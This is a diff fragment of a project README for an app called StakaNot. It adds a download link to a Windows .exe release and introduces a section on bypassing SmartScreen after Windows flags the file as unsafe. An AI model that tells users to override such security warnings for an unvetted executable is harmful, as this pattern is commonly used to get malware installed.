stakanot/StakaNot/README.md

+## 📥 Download the latest version

+👉 You can download the latest version of **StakaNot** [here](https://github.com/stakanot/StakaNot/releases/download/stakanot/StakaNot.exe).

+---

 ## 🚧 How to run the app: bypassing SmartScreen (Windows)

 When you download the `.exe` file, Windows might flag it as unsafe because the app is new and not yet widely recognized.